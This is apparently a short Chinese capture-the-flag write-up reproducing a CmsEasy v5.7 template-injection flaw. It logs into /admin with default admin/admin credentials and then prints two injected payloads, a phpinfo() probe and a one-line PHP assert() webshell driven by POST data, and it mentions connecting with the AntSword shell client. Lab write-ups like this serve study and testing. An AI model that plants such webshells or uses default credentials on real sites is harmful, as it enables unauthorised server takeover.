【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
清风一徐10 分钟前
禅道从18.3升级到21.7.6版本
笔记
Jack___Xue13 分钟前
LangChain实战快速入门笔记(六)--LangChain使用之Agent
笔记·langchain·unix
零度@24 分钟前
SQL 调优全解:从 20 秒到 200 ms 的 6 步实战笔记(附脚本)
数据库·笔记·sql
im_AMBER1 小时前
Leetcode 78 识别数组中的最大异常值 | 镜像对之间最小绝对距离
笔记·学习·算法·leetcode
听*雨声2 小时前
03_软考_网络安全
安全·web安全
其美杰布-富贵-李2 小时前
HDF5文件学习笔记
数据结构·笔记·学习
d111111111d3 小时前
在STM32函数指针是什么,怎么使用还有典型应用场景。
笔记·stm32·单片机·嵌入式硬件·学习·算法
静小谢3 小时前
前后台一起部署,vite配置笔记base\build
前端·javascript·笔记
蔷薇灵动4 小时前
守护智慧校园数字命脉:微隔离构建全局可视、精准防护的内网安全
安全
ask_baidu4 小时前
Doris笔记
android·笔记